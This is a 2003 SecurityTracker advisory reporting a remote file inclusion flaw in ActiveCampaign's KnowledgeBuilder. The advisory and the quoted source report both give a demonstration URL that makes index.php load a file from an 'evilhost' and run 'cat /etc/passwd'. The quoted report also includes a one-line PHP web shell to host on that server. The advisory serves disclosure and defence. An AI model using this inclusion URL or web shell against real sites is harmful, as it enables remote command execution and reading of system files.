SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Application (Generic)  >   KnowledgeBuilder Vendors:   ActiveCampaign, Inc.
KnowledgeBuilder Include File Flaw Lets Remote Users Execute Arbitrary OS Commands
SecurityTracker Alert ID:  1008557
SecurityTracker URL:  http://securitytracker.com/id/1008557
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Dec 27 2003
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  

Description:   An include file vulnerability was reported in KnowledgeBuilder. A remote user can execute arbitrary operating system commands on the target system.

Zero X reported that the software does not validate the 'page' location variable for the 'index.php' script. A remote user can specify a remote location for the index.php file to cause the remote PHP file to be included and executed on the target system.

A demonstration exploit URL is provided:

http://[target]/kb/index.php?page=http://[evilhost]/index&cmd=cat%20/etc/passwd

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system. The code and commands will run with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.activecampaign.com/kb/ (Links to External Site)
Cause:   Input validation error
Underlying OS:   Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Date:  24 Dec 2003 13:45:22 -0000
Subject:  Remote Code Execution in Knowledge Builder.




Remote Code Execution in Knowledge Builder.

"Knowledge Builder" from www.activecampaign.com allows to execute code.

Example:

Create the following file on your webserver:

----index.php----
<?
system($cmd);
?>
-----------------

And then type in the following URL:

http://targethost/kb/index.php?page=http://evilhost/index&cmd=cat /etc/passwd


Zero X, member of www.lobnan.de and www.lostkey.org

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2014, SecurityGlobal.net LLC